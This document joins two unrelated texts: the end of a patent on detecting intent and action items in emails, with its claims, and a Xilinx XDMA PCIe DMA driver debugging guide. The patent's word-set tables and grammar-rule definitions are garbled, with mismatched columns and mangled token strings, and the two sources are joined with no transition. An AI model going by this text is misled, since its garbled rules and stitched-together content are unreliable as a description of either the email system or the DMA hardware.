[0169] The Flag is set to Action Item only if both the Surface_Score and the Conversation_Score are high.
[0170] The Flag is set to Important if Content_Score is high and either the Surface_Score (action required) or the Conversation_Score (Sender is important) is high.
[0171] All other cases indicate that the email is not important and the flag is set to FYI.
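The three assumptions above can be expressed directly as a decision function; the 0.5 threshold for "high" is an illustrative choice, not from the source:

```python
def flag_email(surface_score, conversation_score, content_score, high=0.5):
    """Map the three normalized scores to an email status flag
    following the assumptions stated above."""
    surface_high = surface_score >= high
    conversation_high = conversation_score >= high
    content_high = content_score >= high

    # Action Item only if both Surface and Conversation scores are high.
    if surface_high and conversation_high:
        return "Action Item"
    # Important if Content is high and either an action is required
    # (Surface high) or the Sender is important (Conversation high).
    if content_high and (surface_high or conversation_high):
        return "Important"
    # All other cases: the email is not important.
    return "FYI"
```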
[0172] The logic assumed above is based on one interpretation of how emails may be marked or flagged. Examples of the usage of such flags are shown for an embodiment for a desktop email client in FIG. 11 and for a smartphone in FIG. 13. There may be many other ways of flagging the emails that are important to the user.
[0173] Example embodiments in which the text of a message is highlighted when an intent is detected are shown for a smartphone in FIG. 12, for an email bot in FIG. 16, and for a web mail client in FIG. 17.
Dashboard: Access to Emails, Schedules, etc.
[0174] Because different users access their emails differently, particular embodiments have built an email dashboard for users to access email by different criteria. As shown in FIG. 8, a user can access emails by the following categories:
[0175] All Emails—the traditional view as shown in the embodiment for a desktop email client in FIG. 11 and for a smartphone in FIG. 13.
[0176] Action Items—sorted by those that have been flagged to have action items as shown in the smartphone embodiment of FIG. 14.
[0177] Waiting Response—those emails where the User has sent an Action Item and is waiting for a response, such as a commitment, from the recipient. This also includes emails that have been delegated by the User to a Contact and where the User is awaiting a follow-up from the Contact as shown in the smartphone embodiment of FIG. 14.
[0178] Deferred—those emails that had action items that the user still needs to respond to since he/she has deferred the response as shown in the smartphone embodiment of FIG. 14.
[0179] Important Contacts—sorted by the Contacts most important to the User, i.e., those Contacts with whom the User has the most conversations as shown in the smartphone embodiment of FIG. 15.
[0180] Topics—organized by common topics of discussion in the email.
[0181] FIG. 15 shows examples of how some of the above categories of emails are assembled with both automation and analytics executed and with input from the user. Action Items and Delegating Response are not described below; instead, Deferred and Delegated Emails and the Important Contacts view are described.
Deferred or Delegated Emails
[0182] Emails can be deferred by the User on detection of an Action Item. This is one of the options presented as shown in the smartphone embodiment of FIG. 12.
Important Contacts View
[0183] Another common view desired by users is to see emails from the user's most Important Contacts, i.e., the contacts with whom the user has the most frequent conversations via email.
[0184] Because particular embodiments analyze Conversations by Contact using the Conversation Analysis, the system can automatically sort the most important contacts, and also show Unread emails from the Contact, Action Items owed to the User, emails deferred to the Contact, emails to the Contact for which the User is awaiting a response, and emails sorted by Topics.
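Ranking contacts by conversation volume, as described above, can be sketched as follows; the input representation (one log entry per exchanged message) is an illustrative assumption:

```python
from collections import Counter

def important_contacts(conversation_log, top_n=5):
    """Rank contacts by how many email conversations the user has had
    with each; conversation_log is a list of contact names, one entry
    per exchanged message."""
    counts = Counter(conversation_log)
    return [contact for contact, _ in counts.most_common(top_n)]
```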
Event Detection web-based API
[0185] Besides the embodiment for email applications, another class of embodiments is a web-based API. An embodiment of this is shown in FIG. 18. Another application of such an API is the analysis, for intent detection, of online posts on a web site, including posts on a social media site. One such embodiment of detecting the action item or commitment intents for posts on a social media website is shown in FIG. 19.
Special application for Intent Detection for CRM
[0186] A special case of using event and intent detection is customer support. Sales personnel are in frequent email communication with existing or prospective customers, containing questions and commitments to follow up. The customer support department usually sends an initial response within 2-3 hours of first receiving an email, acknowledging the issue and, if possible, offering some kind of workaround or resolution, and then follows up with a detailed response within a day. Intent detection analytics can be used to detect questions from customers in emails incoming to support personnel. It can also be used to track the commitments made by support personnel to customers. Using intent detection together with topic detection allows the customer support department to build an email plug-in that can surface high-risk emails, allowing personnel to respond to them more quickly. A customer support supervisor can then pull a report of all commitments made by personnel and get a better view of current status. FIG. 20 shows an embodiment of a dashboard that is used to track issues raised by customers and commitments made by personnel for a given customer over a timeline.
An Illustrative Example of Processing for Event Detection Analytics
[0187] A simple, limited example of how an event detection analytics system is set up for a predefined event is now provided. The steps used in the process to derive the event detection logic are shown in FIGS. 2 and 4.
Event: message sender intends "to buy a computer"
Data Sources: email and social media posts
[0188] In this example it will be assumed that text extraction 100, tokenization 201, and segmentation 202 of the email or post text from the data source have been done. The primary steps in setting up the analytics are those that define the event detection logic 150.
[0189] The event definition 120 in FIG. 4 requires defining different constructs for the event where the sender expresses intent to purchase a computer.
[0190] To create a number of primary constructs 420 (limited in this example to the following), these simple expressions are considered:
[0191] “We will get a laptop.”
[0192] “I could order a Mac online.”
[0193] “Gonna buy a computer today.”
[0194] As part of the process to categorize the primary constructs 440, different verb expressions related to "buying" are considered. The set of verbs related to buying or "purchasing" may include a list of synonyms and equivalent expressions. The following set "purchases" is an example:
<table>
<thead>
<tr>
<th>WeSimple</th>
<th>Will</th>
<th>WeFuture</th>
<th>Articles</th>
</tr>
</thead>
<tbody>
<tr>
<td>gonna purchase</td>
<td>Wanna purchase</td>
<td>buy</td>
<td>the</td>
</tr>
</tbody>
</table>
[0195] Similarly, the set of nouns describing the computer may include all forms of “computer”. The following set “computer” is an example:
<table>
<thead>
<tr>
<th>JWeSimple</th>
<th>Will</th>
<th>JWeFuture</th>
<th>Articles</th>
</tr>
</thead>
<tbody>
<tr>
<td>computer</td>
<td>computer</td>
<td>laptop/netbook/notebook/desktop/PC/Mac</td>
<td></td>
</tr>
</tbody>
</table>
[0196] Based on the above, a simple set of grammar rules 450 would include:
[0197] JWeSimple\_Will\_purchase\_Articles\_computer
[0198] JWeFuture\_purchase\_Articles\_computer
[0199] JWeWould\_purchase\_Articles\_computer
[0200] PHASE\_START\_JWe\_going\_to\_purchase\_Articles\_computer
[0201] PHASE\_START\_JWe\_gonna\_purchase\_Articles\_computer
[0202] PHASE\_START\_JWe\_wanna\_purchase\_Articles\_computer
[0203] PHASE\_START\_JWe\_want\_to\_purchase\_Articles\_computer
[0204] The above form of the grammar is based on the syntax the parser uses to process the message or post. In the above, the different sets such as JWeSimple refer to word sets used for pronouns, verb forms, and articles, and are defined as:
[0205] JWeSimple=\_i\_we\_ll
[0206] JWeFuture=\_i\_ll\_we\_ll
[0207] JWe=\_i\_we\_l\_we\_d\_i\_li\_m\_we\_rel\_i\_ll\_we\_ll\_m\_i\_we\_re
[0208] Will=\_i\_ll\_w\_i\_ll\_s\_l\_i\_ll\_should=\_c\_ould
[0209] Articles=\_a\_i\_n\_the
[0210] The event detection logic 150 in FIG. 2 that uses the above set of grammar rules correctly identifies the intent to buy a computer as per the examples that were listed earlier. The above example serves to illustrate how the method described herein is used to set up the analytics for event detection. Based on the foregoing analysis, the system may output an indication that the sender of the message intends to buy a computer.
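The grammar-rule matching used by the event detection logic can be sketched as follows. The word sets and the single rule shown are simplified, illustrative stand-ins for the sets and grammar rules 450 above, not their actual contents:

```python
# Simplified word sets corresponding to the grammar's token classes.
SETS = {
    "JWeFuture": {"i'll", "we'll"},
    "purchase": {"buy", "purchase", "order", "get"},
    "Articles": {"a", "an", "the"},
    "computer": {"computer", "laptop", "netbook", "notebook",
                 "desktop", "pc", "mac"},
}

# One simplified rule: JWeFuture_purchase_Articles_computer.
RULES = [("JWeFuture", "purchase", "Articles", "computer")]

def detect_buy_intent(tokens):
    """Return True if any rule matches a contiguous token sequence."""
    tokens = [t.lower() for t in tokens]
    for rule in RULES:
        n = len(rule)
        for i in range(len(tokens) - n + 1):
            # Each rule position names a word set the token must belong to.
            if all(tokens[i + j] in SETS[rule[j]] for j in range(n)):
                return True
    return False
```

A matching message such as "We'll get a laptop" triggers the rule; unrelated text does not.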
Embodiment Approach
[0211] FIG. 21 illustrates an example of a special purpose computer system 2000 configured with an event detection system according to one embodiment. Computer system 2000 includes a bus 2002, network interface 2004, a computer processor 2106, a memory 2108, a storage device 2110, and a display 2112. Computer processor 2106 may execute computer programs stored in memory 2108 or storage device 2110. Any suitable programming language can be used to implement the routines of particular embodiments including C, C++, Java, assembly language, etc. Different programming techniques can be employed such as procedural or object oriented. The routines can execute on a single computer system 2000 or multiple computer systems 2000. Further, multiple processors 2106 may be used.
[0212] Memory 2108 may store instructions, such as source code or binary code, for performing the techniques described above. Memory 2108 may also be used for storing variables or other intermediate information during execution of instructions to be executed by processor 2106. Examples of memory 2108 include random access memory (RAM), read only memory (ROM), and any other medium from which a computer can read.
[0213] Storage device 2110 may also store instructions, such as source code or binary code, for performing the techniques described above. Storage device 2110 may additionally store data used and manipulated by computer processor 2106. For example, storage device 2110 may be a database that is accessed by computer system 2000. Other examples of storage device 2110 include random access memory (RAM), hard drive, a magnetic disk, an optical disk, a CD-ROM, a DVD, a flash memory, a USB memory card, or any other medium from which a computer can read.
[0214] Memory 2108 or storage device 2110 may be an example of a non-transitory computer-readable storage medium for use by or in connection with computer system 2000. The computer-readable storage medium contains instructions for controlling a computer system to be operable to perform functions described by particular embodiments. The instructions, when executed by one or more computer processors, may be operable to perform that which is described in particular embodiments.
[0216] Computer system 2000 includes a display 2112 for displaying information to a computer user. Display 2112 may display a user interface used by a user to interact with computer system 2000.
[0217] Computer system 2000 also includes a network interface 2004 to provide data communication connection over a network, such as a local area network (LAN) or wide area network (WAN). Wireless networks may also be used. In any such implementation, network interface 2004 sends and receives electrical, electromagnetic, or optical signals that carry digital data streams representing various types of information.
[0218] Computer system 2000 can send and receive information through network interface 2004 across a network 2114, which may be an Intranet or the Internet. Computer system 2000 may interact with other computer systems 2000 through network 2114. In some examples, client-server communications occur through network 2114. Also, implementations of particular embodiments may be distributed across computer systems 2000 through network 2114.
[0219] The methods described above may be performed by a computer by running computer-readable instructions. The methods may also be performed using an ASIC or other device.
[0220] As used in the description herein and throughout the claims that follow, "a," "an," and "the" includes plural references unless the context clearly dictates otherwise. Also, as used in the description herein and throughout the claims that follow, the meaning of "in" includes "in" and "on" unless the context clearly dictates otherwise.
[0221] The above description illustrates various embodiments of the present invention along with examples of how aspects of the present invention may be implemented. The above examples and embodiments should not be deemed to be the only embodiments, and are presented to illustrate the flexibility and advantages of the present invention as defined by the following claims. Based on the above disclosure and the following claims, other arrangements, embodiments, implementations and equivalents may be employed without departing from the scope of the invention as defined by the claims.
What is claimed is:
1. A method for analyzing text, said method comprising:
providing first text in a computer-readable format;
tokenizing the first text to yield units of the first text;
segmenting the units of first text to yield second text;
parsing the second text to yield parsed second text;
correlating at least one grammar rule to the parsed second text;
providing a message as to the purpose of the first text based on the at least one correlated grammar rule.
2. The method of claim 1, wherein providing a message comprises providing an indication message as to the purpose of the first text based on the at least one correlated grammar rule.
3. The method of claim 1 wherein the purpose includes an inquiry.
4. The method of claim 1 wherein the purpose includes a predetermined event.
5. The method of claim 1, wherein the purpose includes a specific action.
6. The method of claim 1, wherein the purpose includes an intent to perform a specific action.
7. The method of claim 1, wherein the purpose includes predetermined information related to a named entity.
8. The method of claim 1, wherein the at least one grammar rule includes a predetermined sequence of units.
9. The method of claim 1, wherein the at least one grammar rule includes a predetermined combination of units.
10. The method of claim 1 and further comprising analyzing the parsed second text based on at least one correlated grammar rule to detect specific information related to the purpose.
11. The method of claim 10, wherein the specific information relates to the time.
12. The method of claim 10, wherein the specific information relates to entities related to the purpose.
13. The method of claim 10, wherein the specific information relates to the location of the purpose.
14. The method of claim 10, wherein the specific information relates to the sentiment of the second text.
15. The method of claim 1, wherein the purpose relates to an intent to purchase an item.
16. The method of claim 14, and further comprising analyzing the parsed second text to determine the item that is intended to be purchased.
17. The method of claim 1, wherein the purpose relates to the dissemination of information.
18. The method of claim 17, and further comprising analyzing the parsed second text to determine the topic of the information.
19. The method of claim 17, wherein the information is related to at least one predetermined named entity.
20. A method for analyzing text, said method comprising:
providing first text in a computer-readable format;
tokenizing the first text to yield units of the first text;
segmenting the units of first text to yield second text;
parsing the second text to yield parsed second text;
correlating at least one grammar rule to the parsed second text; and
providing a message as to the purpose of the first text based on the at least one correlated grammar rule;
wherein the message comprises providing an indication as to the purpose of the first text based on the at least one correlated grammar rule;
wherein the purpose may include a predetermined event, an inquiry, a specific action, an intent to perform a specific action; and
disseminating the information related to a named entity or time or location or sentiment.
Introduction
The Xilinx PCI Express DMA (XDMA) IP provides high-performance Scatter Gather (SG) direct memory access (DMA) via PCI Express. Using the IP and the associated drivers and software, users can generate high-throughput PCIe memory transactions between a host PC and a Xilinx FPGA.
This document provides tips and techniques for debugging XDMA IP issues. As an introduction, an overview of the XDMA architecture is provided along with its working mechanism. For more details, users are advised to check the XDMA IP product guide (PG195).
At the end of this document, the working mechanism of the XDMA IP legacy drivers provided in (Xilinx Answer 65444) is described. This section is included to give users knowledge of how the drivers work. If advanced debugging is required, it is advised to add printf statements at different points in the provided driver source to narrow down the source of the issue.
DMA Architecture and Overview
The XDMA IP consists of the following interfaces as shown in Figure 1:
- **User Data Interface**
- AXI-MM (Memory Mapped) or AXI-ST (Streaming)
- Separate data port per channel in AXI-ST Interface; data port is shared between channels in the AXI-MM interface
- Up to 4 physical Read (H2C) and 4 Write (C2H) Data Channels
- Each channel enabled has a dedicated engine for H2C and C2H
- Descriptor module is common for all engines
- **Control Interfaces**
- AXI-MM Lite Master Control Interface
- AXI-MM Lite Slave Control Interface accessible from user application
- **DMA Bypass Interface**
- AXI-MM Bypass Port
- Enables Host direct access to user application
- **User Interrupts**
- Up to 16 user interrupts
- **Status ports**
  - Each channel has a status port
**AXI MM interface**
As shown in Figure 2, the AXI MM data port is shared among the configured channels. C2H channels will master reads on the AR bus and H2C channels will master writes on the AW bus.
AXI Stream Interface
When the IP is configured with the AXI Stream Interface option, each channel will have its own AXI Stream interface as shown in Figure 3.
**Figure 3 - XDMA AXI Stream Interface**
**Descriptor Format**
Table 1 shows the descriptor format. Descriptors reside in host memory. Each descriptor has a source address, a destination address, a length, and a pointer to the next descriptor on the list unless the STOP bit is set. The Nxt_adj field indicates how many contiguous descriptors follow at the next descriptor address.
<table>
<thead>
<tr>
<th>Offset</th>
<th>Field</th>
<th>Bit Index</th>
<th>Sub Field</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x0</td>
<td>Magic</td>
<td>15:0</td>
<td></td>
<td>16'had4b. Code to verify that descriptor is valid.</td>
</tr>
<tr>
<td></td>
<td>Nxt_adj</td>
<td>5:0</td>
<td></td>
<td>The number of additional adjacent descriptors after the descriptor located at the next descriptor address field. A block of adjacent descriptors cannot cross a 4K boundary.</td>
</tr>
<tr>
<td>0x0</td>
<td>Control</td>
<td>4</td>
<td>EOP</td>
<td>End of packet (AXI ST C2H only)</td>
</tr>
<tr>
<td></td>
<td></td>
<td>1</td>
<td>Completed</td>
<td>Set to (1) to interrupt after the engine has completed this descriptor.</td>
</tr>
<tr>
<td></td>
<td></td>
<td>0</td>
<td>Stop</td>
<td>Set to (1) to stop the engine when it completes this descriptor.</td>
</tr>
<tr>
<td>0x04</td>
<td>Len</td>
<td>[27:0]</td>
<td></td>
<td>Descriptor Data length</td>
</tr>
<tr>
<td>0x08 & 0x0C</td>
<td>Source Address</td>
<td>63:0</td>
<td></td>
<td>Source address for the DMA transfer</td>
</tr>
<tr>
<td>0x10 & 0x14</td>
<td>Destination Address</td>
<td>63:0</td>
<td></td>
<td>Destination address for the DMA transfer</td>
</tr>
<tr>
<td>0x18 & 0x1C</td>
<td>Next Descriptor Address</td>
<td>63:0</td>
<td></td>
<td>Address of the next descriptor in the list</td>
</tr>
</tbody>
</table>
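Host software builds descriptor lists in this format. The sketch below models the chaining of descriptors for a large transfer, splitting at the 28-bit Len limit and setting the Stop bit on the last descriptor. It is an illustrative model of the Table 1 fields, not the actual driver code; packing into the 32-byte binary layout and the 4K adjacency constraint on Nxt_adj are omitted for brevity.

```python
MAGIC = 0xAD4B                 # descriptor validity code (16'had4b)
MAX_DESC_LEN = (1 << 28) - 1   # Len field is 28 bits wide

def build_descriptor_chain(src, dst, total_len, desc_base):
    """Split a DMA transfer into a linked list of descriptors.

    Returns a list of dicts mirroring the Table 1 fields; desc_base is
    the host address where the descriptors will live, assuming 32 bytes
    per descriptor laid out contiguously.
    """
    descs = []
    offset = 0
    while offset < total_len:
        chunk = min(total_len - offset, MAX_DESC_LEN)
        descs.append({
            "magic": MAGIC,
            "len": chunk,
            "src_addr": src + offset,
            "dst_addr": dst + offset,
            "nxt_addr": 0,
            "stop": 0,
        })
        offset += chunk
    # Link each descriptor to the next; Stop terminates the list.
    for i, d in enumerate(descs[:-1]):
        d["nxt_addr"] = desc_base + 32 * (i + 1)
    descs[-1]["stop"] = 1
    return descs
```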
XDMA BAR Routing
All of the requests from the host are directed to different interfaces based on the BAR hit. Which interface corresponds to which BAR is shown in Table 2 and Table 3. The PCIe to DMA interface is always selected by default. Figure 4 shows the routing mechanism for incoming requests from the host when the "PCIe to AXI Lite Master" and "PCIe to DMA Bypass" interfaces are enabled.
<table>
<thead>
<tr>
<th>Default</th>
<th>BAR0 (32-bit)</th>
<th>BAR1 (32-bit)</th>
<th>BAR2 (32-bit)</th>
</tr>
</thead>
<tbody>
<tr>
<td>PCIe to AXI Lite Master enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td></td>
</tr>
<tr>
<td>PCIe to AXI Lite Master and PCIe to DMA Bypass enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
<tr>
<td>PCIe to DMA Bypass enabled</td>
<td>DMA</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
</tbody>
</table>
Table 2 - XDMA BAR Routing (32-bit) [Ref: PG195]
<table>
<thead>
<tr>
<th>Default</th>
<th>BAR0 (64-bit)</th>
<th>BAR2 (64-bit)</th>
<th>BAR4 (64-bit)</th>
</tr>
</thead>
<tbody>
<tr>
<td>PCIe to AXI Lite Master enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td></td>
</tr>
<tr>
<td>PCIe to AXI Lite Master and PCIe to DMA Bypass enabled</td>
<td>PCIe to AXI Lite Master</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
<tr>
<td>PCIe to DMA Bypass enabled</td>
<td>DMA</td>
<td>DMA</td>
<td>PCIe to DMA Bypass</td>
</tr>
</tbody>
</table>
Table 3 - XDMA BAR Routing (64-bit) [Ref: PG195]
DMA Driver
The purpose of a DMA driver running on the host CPU is to prepare peripheral DMA transfers, because only the operating system (OS) has full control over the memory system, the file system, and the user-space processes. First, the peripheral device's DMA engine is programmed with the source and destination addresses of the memory ranges to copy. Second, the device is signaled to begin the DMA transfer. When the transfer is finished, the device usually raises an interrupt to inform the CPU. For each interrupt, an interrupt handler, previously installed by the driver, is called, and the finished transfer can be acknowledged accordingly by the OS.
XDMA Linux Driver and Example Application
The XDMA driver provided in (Xilinx Answer 65444) consists of the following user accessible devices. The driver is provided as a reference. It is the user’s responsibility to modify the driver to add specific requirements, or build one from scratch, as per the need of their custom design.
- xdma0_control : to access XDMA registers
- xdma0_user : to access AXI-Lite Master interface
- xdma0_bypass : to access DMA-Bypass interface
- xdma0_h2c_0/1/2/3, xdma0_c2h_0/1/2/3 : to access each channel
There are three tests included in (Xilinx Answer 65444) which are as follows:
- run_test.sh: script to do a basic transfer
  - Loads the driver, determines whether the design is AXI-MM or AXI-ST, and detects how many channels are enabled.
  - Performs a basic transfer on all enabled channels.
  - Checks for data integrity.
  - Reports pass or fail.
- load_driver.sh: loads the driver
- perform_hwcount.sh: measures hardware performance
**Example Application**
*(Xilinx Answer 65444)* provides the following applications:
- **dma_to_device**
- [AXI-MM] `dma_to_device -d /dev/xdma0_h2c_0 -f infile.bin -s 4096 -a 1000 -o 24`
- [AXI-ST] `dma_to_device -d /dev/xdma0_h2c_0 -f infile.bin -s 4096 -o 24`
- **dma_from_device**
- [AXI-MM] `dma_from_device -d /dev/xdma0_c2h_0 -f outfile.bin -s 4096 -a 1000 -o 24`
- [AXI-ST] `dma_from_device -d /dev/xdma0_c2h_0 -f outfile.bin -s 4096 -o 24`
- **reg_rw**
- The Linux utility `dd` can also be used for DMA transfers. `dd` is a basic Linux utility to copy data; it also gives bandwidth information.
- `dd if=/dev/zero of=/dev/xdma0_h2c_0 bs=4096 count=1`
- Will transfer 4Kbytes from Host to Card
- `dd of=/dev/null if=/dev/xdma0_c2h_0 bs=4096 count=1`
- Will transfer 4Kbytes from Card to Host
DMA Transfer flow for H2C and C2H
Register Programming during ‘driver load’ process
```
Load driver (setup)
Set ‘H2C Channel interrupt enable mask’ register 0x0090 (Table 2-49) to generate interrupts for corresponding bits.
Set ‘C2H Channel interrupt enable mask’ register 0x1090 (Table 2-68) to generate interrupts for corresponding bits.
Set ‘IRQ Block Channel Interrupt Enable Mask’ register 0x2010 (Table 2-81), enable all channels both H2C and C2H to generate interrupt.
```
© Copyright 2018 Xilinx
H2C Transfer
Figure 6 - H2C Transfer Flowchart [Ref: PG195]
The flowchart describes the following sequence:
1. The application program initiates an H2C transfer, with the transfer length and the buffer location where the data is stored.
2. The driver creates descriptors based on the transfer length.
3. The driver writes the first descriptor base address to addresses 0x4080 (Table 2-108) and 0x4084 (Table 2-109), and writes the next adjacent descriptor count to 0x4088 (Table 2-110), if any.
4. The driver starts the H2C transfer by writing to the H2C engine's control register, address 0x0004 (Table 2-40).
5. The DMA initiates a descriptor fetch request for one or more descriptors (depending on the adjacent descriptor count) and receives them, repeating until the last descriptor has been fetched.
6. The DMA sends a read request to the (Host) source address based on the first available descriptor, receives data from the Host for that descriptor, and transmits the data on the (Card) AXI-MM Master interface; this repeats while there is more data to transfer, after which the DMA stops fetching data from the Host.
7. The DMA sends an interrupt to the Host.
8. Interrupt processing: the driver reads the 'IRQ Block Channel Interrupt Request' register 0x2044 (Table 2-85) to see which channels sent the interrupt, and masks the corresponding channel interrupt by writing to 0x2018 (Table 2-83).
9. The driver reads the corresponding 'Status register' 0x0044 (Table 2-44), which also clears the status register, then reads the channel 'Completed descriptor count' 0x0048 (Table 2-45) and compares it with the number of descriptors generated.
10. The driver writes to the channel 'Control register' 0x0004 (Table 2-40) to stop the DMA run, writes to the 'Block channel interrupt Enable Mask' 0x2014 (Table 2-82) to enable interrupts for the next transfer, and returns control to the application program with the transfer size.
11. The application program exits.
In Figure 6, the actions performed by the XDMA driver (shown in yellow boxes) are also reflected in the dmesg log.
The snapshots below are excerpts from the dmesg log taken by running the test application (run_test.sh) that comes with the (Xilinx Answer 65444) driver.
Note: Some driver tasks, as explained in the flow chart, such as reading the completed descriptor count register and writing to the Block channel interrupt enable Mask register, are not explicitly visible in the dmesg log.
C2H Transfer
Figure 7 - C2H Transfer Flowchart [Ref: PG195]
Similar to the H2C transfer, below are excerpts from the dmesg log of a C2H transfer obtained by running the example application (run_test.sh).
1. The application program initiates the C2H transfer, passing the transfer length and the receive buffer location.
2. The driver creates descriptors based on the transfer length.
3. The driver writes the first descriptor base address to addresses 0x5080 (Table 2-114) and 0x5084 (Table 2-115), and writes the next adjacent descriptor count to 0x5088 (Table 2-116), if any.
4. The driver starts the C2H transfer by writing to the C2H engine's control register, address 0x1004 (Table 2-59).
5. The DMA issues descriptor fetch requests and receives one or more descriptors per request (depending on the adjacent descriptor count), repeating until the last descriptor has been fetched.
6. For each descriptor, the DMA reads data from the (Card) source address and transmits it over PCIe to the (Host) destination address; this repeats while there is more data to transfer.
7. When the transfer is complete, the DMA sends an interrupt to the Host.
8. Interrupt processing: the driver reads 'IRQ Block Channel Interrupt Request' 0x2044 (Table 2-85) to see which channels sent the interrupt, and masks the corresponding channel interrupt by writing to 0x2018 (Table 2-83).
9. The driver reads the corresponding 'Status register' 0x1044 (Table 2-63), which also clears it, then reads the channel 'Completed descriptor count' 0x1048 (Table 2-64) and compares it with the number of descriptors generated.
10. The driver writes to the channel 'Control register' 0x1004 (Table 2-59) to stop the DMA run, writes to the 'Block channel interrupt Enable Mask' 0x2014 (Table 2-82) to enable interrupts for the next transfer, and returns control to the application program with the transfer size.
11. The application program reads the transferred data from the assigned buffer, writes it to a file, and exits.
The dmesg excerpts show the driver performing the following actions:
- Creates descriptors based on the transfer length.
- Writes the first descriptor base address to addresses 0x5080 and 0x5084, and the next adjacent descriptor count to 0x5088, if any.
- Starts the C2H transfer by writing to the C2H engine's control register, address 0x1004.
- Receives the interrupt from the DMA engine after transfer completion and services it.
- Reads the corresponding 'Status register' 0x1044, which also clears it.
- Writes to the channel 'Control register' 0x1004 to stop the DMA run.
Other Driver Options
- **Poll mode**
- No interrupts are used
- `insmod ../driver/xdma.ko poll_mode=1`
- **Descriptor Credit based transfer**
  - Handshake between software and hardware
  - Software gives descriptor credits for the hardware to use
  - Once the hardware has used up its credits, it waits for more
  - In the current XDMA driver, 'Descriptor Credit based transfer' is supported only for C2H Streaming
- `insmod ../driver/xdma.ko enable_credit_mp=1`
**Windows Driver**
The Windows driver concept is the same as the Linux driver's. Debug messages can be traced using the TraceView program, which is part of the WDK. See the Windows driver document in [Xilinx Answer 65444](https://www.xilinx.com) for details.
**lspci**
Figure 8 shows a sample lspci output log. lspci is helpful for preliminary debug of XDMA in the Linux environment. The lspci log provides the following useful information pertaining to XDMA operation.
- **BAR information**: Confirms the BAR addresses that are assigned and the size of each BAR.
- **Link Status**: Shows the actual trained link speed. Check this first if throughput is lower than expected.
- **Interrupts**: The interrupt type in use: Legacy, MSI, or MSI-X.
- **Errors**: Gives details on uncorrectable errors, RX overflow, etc.
- **Bus Master Capability**: Bus Master capability is essential for DMA functionality; whether it is enabled can be checked in the lspci log.
The lspci output also shows the kernel driver in use at the bottom of its output.
**Figure 8 - lspci sample output log for XDMA**
**Driver Debug**
By default, driver debug messages are turned off (for better performance). To enable the debug messages, in "include/xdma-core.h", change `#define XDMA_DEBUG 0` to `#define XDMA_DEBUG 1`. This is for the legacy driver. For the latest driver provided in (Xilinx Answer 65444), do the following:
In xdma/libxdma.h file:
- Add `#define __LIBXDMA_DEBUG__`
- Set `XDMA_DEBUG` to `'1'` instead of `'0'`.
After making the change, compile the driver.
The `dmesg` command is used to print out the debug messages from the XDMA driver. Below are the important sections of the debug message log that a user should review when debugging driver issues.
**Driver Load**
- BAR probing
- Channel probing
- Interrupt setup
**DMA Transfer**
- Messages for the entire transfer run
- Prints descriptor dump
- Shows register writes and reads
- Shows interrupt service routine
**BAR Probing**
The driver scans through all of the BARs of the endpoint device and shows which BAR is configured as a DMA BAR. Therefore, in the case of an error when loading the driver, you can check if the DMA configuration BAR is recognised by the driver or not. Figure 9 shows an example of the dmesg log when the BAR configuration is as follows:
- BAR 0: AXI-Lite Interface
- BAR 1: DMA
- BAR 2: DMA Bypass Interface
```plaintext
[ 86.349515] xdma 8800:01.00.0: irq 172 for MSI/MSI-X
[ 85.349547] request_regions():pci_request_regions()
[ 86.349550] map_single_bar():BAR0: 1048576 bytes to be mapped.
[ 86.349608] map_single_bar():BAR0 at 0xdf100000 mapped at 0xffffc9001250000, length=1048576(/1048576)
[ 86.349611] is_config_bar():BAR 0 is not XDMA config BAR, irq_id = 0, cfg_id = 0
[ 86.349612] map_single_bar():BAR1: 65536 bytes to be mapped.
[ 86.349621] map_single_bar():BAR1 at 0xdf200000 mapped at 0xffffc9001200000, length=65536(/65536)
[ 86.349623] is_config_bar():BAR 1 is the XDMA config BAR
[ 86.349624] map_single_bar():BAR2: 1048576 bytes to be mapped.
[ 86.349680] map_single_bar():BAR2 at 0xdf300000 mapped at 0xffffc9001270000, length=1048576(/1048576)
[ 86.349681] map_single_bar():BAR #3 is not present - skipping
[ 86.349682] map_single_bar():BAR #4 is not present - skipping
[ 86.349683] map_single_bar():BAR #5 is not present - skipping
[ 86.349685] set_dma_mask():sizeof(dma_addr_t) == 8
[ 86.349687] set_dma_mask():pci_set_dma_mask()
[ 86.349688] set_dma_mask():Using a 64-bit DMA mask.
[ 86.349700] msi_irq_setup():Using IRQ #49 with 0xffff880036121290
[ 86.349701] msi_irq_setup():Using IRQ #50 with 0xffff8800361212b8
[ 86.349713] msi_irq_setup():Using IRQ #51 with 0xffff8800361212e0
[ 86.349719] msi_irq_setup():Using IRQ #52 with 0xffff880036121308
[ 86.349725] msi_irq_setup():Using IRQ #53 with 0xffff880036121330
```
Figure 9 - BAR Configuration and Interrupt Setup dmesg log
**Interrupt Setup**
After BAR mapping, the interrupts get set up. If all three interrupt types (Legacy, MSI, MSI-X) are enabled, MSI-X interrupts take precedence. Figure 9 shows the IRQ numbers and offset addresses being allocated for the MSI-X interrupts.
**Channel Probing**
After probing the BARs and assigning interrupt numbers, the driver will probe all H2C and C2H DMA channels and create a DMA device for all configured channels. Figure 10 shows the DMA channels being probed by the driver when a single H2C and C2H channel are enabled in the IP. As seen in the log, it will create an engine only if it reads a non-zero engine ID.
DMA Transfer
Figure 11 shows the dmesg log for a DMA transfer.
- **Descriptor Dump**: The driver dumps the Descriptor Field on to the message buffer.
- **Transfer Queue**: Starts DMA Engine
- **Interrupt service routine**: interrupt is serviced
- **DMA status read**: H2C engine status displayed and engine stopped
Case Study
Example 1:
Figure 12 shows an example of a bug where the probing failed when all three BARs (AXI lite, DMA, DMA bypass) are enabled. As shown in the dmesg log, the driver fails to determine BAR 1 as an XDMA config BAR because it returns a config_id of 0 instead of a valid value (0x1fc3). This bug has now been fixed in the IP.
Figure 12 - XDMA Probe Failure
Example 2:
Figure 13 shows a dmesg log when XDMA IP got stuck. It shows the H2C channel in BUSY state. The dmesg log is provided here to illustrate what to check during debugging hang scenarios.
Figure 13 - XDMA IP Busy State
Debug: Register/Ports Reads/Writes
The XDMA IP provides registers to help in debugging DMA issues. These registers can be read using reg_rw command provided with the driver in [Xilinx Answer 65444].
For example, `reg_rw /dev/xdma0_control 0x0000 w` will read register 0x0000
Below are some of the registers that would be useful in debugging:
